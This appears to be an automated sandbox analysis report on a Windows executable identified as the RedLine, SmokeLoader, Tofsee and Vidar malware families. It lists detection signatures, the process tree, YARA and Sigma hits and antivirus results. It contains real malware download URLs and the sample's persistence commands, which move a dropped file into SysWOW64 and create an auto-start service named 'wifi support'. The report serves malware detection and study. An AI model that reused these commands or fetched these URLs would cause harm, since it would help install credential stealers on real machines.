
Windows Analysis Report ZA3cYU28Yl.exe

Overview

General Information

Sample Name: ZA3cYU28Yl.exe
Analysis ID: 553399
MD5: 679831cf1f00950b4adffbbba7e6ab46
SHA1: f4aa59829222d5ed000849ea0167082f54b59e03
SHA256: 760d44ea1a90c1b235133258a8f03bed049b5b51328aefe4a2595b6f085dd99d
Tags: exe, TeamBot

Detection

RedLine SmokeLoader Tofsee Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ZA3cYU28Yl.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\ZA3cYU28Yl.exe" MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
    • ZA3cYU28Yl.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\ZA3cYU28Yl.exe" MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 9460.exe (PID: 6608 cmdline: C:\Users\user\AppData\Local\Temp\9460.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • A019.exe (PID: 3340 cmdline: C:\Users\user\AppData\Local\Temp\A019.exe MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
          • A019.exe (PID: 5000 cmdline: C:\Users\user\AppData\Local\Temp\A019.exe MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
        • 9779.exe (PID: 2228 cmdline: C:\Users\user\AppData\Local\Temp\9779.exe MD5: 043B44289E31BD54357F9A5C21833259)
        • A881.exe (PID: 7004 cmdline: C:\Users\user\AppData\Local\Temp\A881.exe MD5: 9AF71C74219794F100EA801B528339AF)
          • cmd.exe (PID: 6520 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\gebcmxiz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 956 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • B217.exe (PID: 4400 cmdline: C:\Users\user\AppData\Local\Temp\B217.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • B217.exe (PID: 6824 cmdline: C:\Users\user\AppData\Local\Temp\B217.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 5672 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6112 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5024 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6376 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3676 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3608 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • rcvfbte (PID: 1308 cmdline: C:\Users\user\AppData\Roaming\rcvfbte MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
    • rcvfbte (PID: 5888 cmdline: C:\Users\user\AppData\Roaming\rcvfbte MD5: 679831CF1F00950B4ADFFBBBA7E6AB46)
  • svchost.exe (PID: 1324 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6868 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\969F.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
  • 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source | Rule | Description | Author | Strings
0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(13 entries in total; only the first 5 are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
20.1.A019.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
26.3.A881.exe.7f0000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
26.2.A881.exe.400000.0.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
26.2.A881.exe.6c0e50.1.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
15.1.rcvfbte.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
(17 entries in total; only the first 5 are shown)

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started | Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community | Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A881.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A881.exe, ParentProcessId: 7004, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\, ProcessId: 956
Sigma detected: New Service Creation
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\A881.exe, ParentImage: C:\Users\user\AppData\Local\Temp\A881.exe, ParentProcessId: 7004, ProcessCommandLine: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5872

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://81.163.30.181/l2.exe | Avira URL Cloud: Label: malware
Source: http://185.7.214.171:8080/6.php | URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe | Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe | URL Reputation: Label: phishing
Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe | Avira URL Cloud: Label: malware
Source: http://81.163.30.181/l3.exe | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\72B9.exe | Avira: detection malicious, Label: HEUR/AGEN.1212012
Source: C:\Users\user\AppData\Local\Temp\B217.exe | Avira: detection malicious, Label: HEUR/AGEN.1211353
Source: C:\Users\user\AppData\Local\Temp\2EE4.exe | Avira: detection malicious, Label: HEUR/AGEN.1212012
Multi AV Scanner detection for domain / URL
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe | Virustotal: Detection: 17%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\293.exe | Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\293.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\48E7.exe | Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\48E7.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\50E7.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\9460.exe | Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\9460.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\969F.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\A019.exe | ReversingLabs: Detection: 46%
Machine Learning detection for sample
Source: ZA3cYU28Yl.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7F9A.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A881.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8ECE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9460.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rcvfbte | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\293.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\41A3.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3657.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\48E7.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\969F.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B217.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A019.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\lnagngtg.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\50E7.exe | Joe Sandbox ML: detected
Source: 26.3.A881.exe.7f0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 26.2.A881.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 22.3.9779.exe.7f0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 26.2.A881.exe.6c0e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 22.2.9779.exe.7d0e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Unpacked PE file: 22.2.9779.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A881.exe | Unpacked PE file: 26.2.A881.exe.400000.0.unpack
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49941 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49942 version: TLS 1.0
Source: ZA3cYU28Yl.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\9460.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49797 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.3:49858 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49860 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49878 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49919 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49927 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49938 version: TLS 1.2
Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000015.00000003.395354648.0000000004A9A000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb) source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: $C:\sujabofu\kusaximenoki-xade\belowupo.pdbh source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
Source: Binary string: fltLib.pdb; source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: dC:\mezakidujawu dukopigowoyiy56\feno_coje.pdbh source: ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: profapi.pdbq source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\sujabofu\kusaximenoki-xade\belowupo.pdb source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: C:\mezakidujawu dukopigowoyiy56\feno_coje.pdb source: ZA3cYU28Yl.exe, ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbk source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
Source: Binary string: cfgmgr32.pdb= source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 1_2_004196BC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
